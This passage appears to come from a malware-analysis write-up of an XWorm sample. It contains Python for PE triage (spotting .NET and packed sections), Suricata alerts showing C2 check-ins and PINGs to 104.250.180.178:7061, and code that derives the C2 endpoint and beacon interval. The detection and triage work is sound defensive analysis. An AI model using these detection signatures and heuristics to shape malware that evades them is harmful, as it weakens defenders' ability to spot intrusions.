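    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", buf, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == 0x10B:          # PE32: NumberOfRvaAndSizes at +92, directories at +96
        nrva_off, dir_off = 92, 96
    elif magic == 0x20B:        # PE32+: +108 / +112
        nrva_off, dir_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    nrva = struct.unpack_from("<I", buf, opt + nrva_off)[0]
    directories = {}
    for i in range(min(nrva, 16)):
        rva, size = struct.unpack_from("<II", buf, opt + dir_off + 8 * i)
        directories[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i          # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", buf, off)
        chars = struct.unpack_from("<I", buf, off + 36)[0]
        data = buf[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "md5": hashlib.md5(data).hexdigest(),
            "entropy": shannon_entropy(data),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
        })
    return {"timestamp": timestamp, "directories": directories, "sections": sections}


def triage(buf: bytes) -> list:
    """Findings for the two checks the report's tables support: managed binary, packed code."""
    pe = parse_pe(buf)
    findings = []
    clr_rva, clr_size = pe["directories"].get("COM_DESCRIPTOR", (0, 0))
    if clr_size:
        findings.append(f"managed (.NET) executable: CLR header at RVA {clr_rva:#x}, size {clr_size:#x}")
    for s in pe["sections"]:
        if s["executable"] and s["entropy"] > PACKED_ENTROPY_THRESHOLD:
            findings.append(f"{s['name']}: executable section with entropy {s['entropy']:.2f}, "
                            "consistent with packed or encrypted code")
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 image (not the analysed sample). Timestamp and layout are made up."""
    text, block = b"", b"constructed-seed"
    while len(text) < 4096:                    # SHA-256 chain: high entropy, deterministic
        block = hashlib.sha256(block).digest()
        text += block
    rsrc = b"\0" * 512
    e_lfanew, opt_size, hdr_size = 0x80, 224, 0x200
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x674E2B00, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 12, 0x2000, 0x8)    # IAT, values as in the table
    struct.pack_into("<II", opt, 96 + 8 * 14, 0x2008, 0x48)   # CLR header, values as in the table
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x2000, len(text), hdr_size, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), 0x4000, len(rsrc), hdr_size + len(text), 0, 0, 0, 0, 0x40000040)
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + sec).ljust(hdr_size, b"\0")
    return headers + text + rsrc


if __name__ == "__main__":
    for finding in triage(build_sample_pe()):
        print(finding)
```

Run against a real file with `triage(open(path, "rb").read())`. The entropy threshold is a heuristic: .NET assemblies that embed a large encrypted blob in .text, as this one appears to, cross it, while ordinary IL-only assemblies do not.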
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-02T22:05:43.176015+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:43.176015+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:44.227321+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:05:44.790619+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:44.792711+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:05:55.884093+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:55.885979+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:06.994799+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:07.009201+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:13.138814+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:13.138814+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:18.105775+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:18.129003+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:29.234953+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:29.243496+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:33.158204+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:33.249214+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:39.610174+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:39.614440+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:41.029021+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:41.030624+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:41.268597+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:41.270089+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:41.572434+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:43.128361+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:43.128361+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:43.628687+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:43.630432+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:44.488521+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:44.492086+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:46.578848+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:46.585300+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:48.988967+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:48.990594+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:00.435045+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:00.440880+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:10.690522+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:10.692084+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:12.908911+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:12.915369+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:13.148654+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:13.148654+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:13.403770+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:13.920690+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:18.263880+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:18.266927+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:23.913779+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:23.922106+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:28.169006+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:28.501242+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:28.502759+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:28.740956+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:28.743182+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:28.978533+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:28.983451+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:29.219260+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:29.221134+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:37.278608+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:37.285940+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:39.555199+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:39.557443+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:43.140971+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:43.140971+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:44.372757+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:44.374746+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:49.482576+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:49.491448+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:49.718348+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:49.719946+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:50.008027+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:50.009606+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:59.940548+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:59.947483+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:00.271031+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:00.275330+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:00.543720+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:00.545398+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:05.428683+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:05.431454+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:13.145222+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:13.145222+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:16.208356+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:16.212491+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:27.338646+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:27.342286+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:36.499975+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:36.503489+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:40.998799+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:41.001640+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:41.258519+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:41.260237+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:43.139674+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:43.139674+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:43.438469+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:43.440421+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:50.521751+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:50.527074+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:09:02.341593+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:09:02.344563+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:09:08.038302+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:09:08.039041+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
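The alert table above is the whole C2 session as the IDS saw it: every row involves the same remote socket, and the server-side PING command (SID 2852874) recurs at :13 and :43 of each minute, i.e. on a fixed 30 s cadence. The Python below is an added example, not part of the Joe Sandbox report: it parses a subset of those rows (pipe-delimited, as in the table) and derives what an analyst would lift from them for blocking and hunting: the C2 socket as the non-private side of the alerts, per-SID counts, and the median beacon interval. `ALERT_ROWS` is copied from the table; the parsing and the choice of the PING SID as the cadence anchor are the example's own assumptions.

```python
"""Triage of IDS alerts for one C2 session: endpoint, signature counts, beacon cadence (added example)."""
import ipaddress
import statistics
from collections import Counter
from datetime import datetime

# Subset of the Suricata table above: the seven inbound PINGs, the two outbound PINGs
# and two of the check-in rows. Columns as in the table, separated by " | ".
ALERT_ROWS = """\
2024-12-02T22:05:43.176015+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:43.176015+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:44.227321+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:05:44.792711+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:13.138814+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:43.128361+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:13.148654+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:28.169006+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:43.140971+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:13.145222+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:43.139674+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
"""

PING_INBOUND_SID = 2852874   # server-to-client PING, the most regular event in the session


def parse_alerts(text: str) -> list:
    """Split pipe-delimited rows into dicts; timestamps keep their +0100 offset."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, sip, sport, dip, dport, proto = [f.strip() for f in line.split("|")]
        alerts.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "signature": sig, "severity": int(sev),
            "src": (sip, int(sport)), "dst": (dip, int(dport)), "proto": proto,
        })
    return alerts


def remote_endpoints(alerts: list) -> Counter:
    """Count the globally routable side of each alert; in a lab capture that is the C2."""
    hits = Counter()
    for a in alerts:
        for ip, port in (a["src"], a["dst"]):
            if ipaddress.ip_address(ip).is_global:
                hits[(ip, port)] += 1
    return hits


def c2_endpoint(alerts: list) -> tuple:
    return remote_endpoints(alerts).most_common(1)[0][0]


def sid_counts(alerts: list) -> Counter:
    return Counter(a["sid"] for a in alerts)


def beacon_interval(alerts: list, sid: int = PING_INBOUND_SID) -> float:
    """Median gap in seconds between successive alerts of one SID (0.0 if fewer than two)."""
    times = sorted(a["ts"] for a in alerts if a["sid"] == sid)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
    return statistics.median(gaps) if gaps else 0.0


def summarize(alerts: list) -> dict:
    ip, port = c2_endpoint(alerts)
    return {
        "c2": f"{ip}:{port}",
        "alerts": len(alerts),
        "sids": dict(sid_counts(alerts)),
        "ping_interval_s": round(beacon_interval(alerts), 1),
    }


if __name__ == "__main__":
    print(summarize(parse_alerts(ALERT_ROWS)))
```

The median rather than the mean is used for the interval so that a single delayed PING does not skew the estimate; a fixed interval with sub-second jitter, as here, is the kind of periodicity a beacon-detection rule keys on in addition to the static SID hits.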
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2024 22:05:32.944418907 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:33.065469027 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:05:33.065558910 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:33.140398979 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:33.261657953 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:05:43.176014900 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
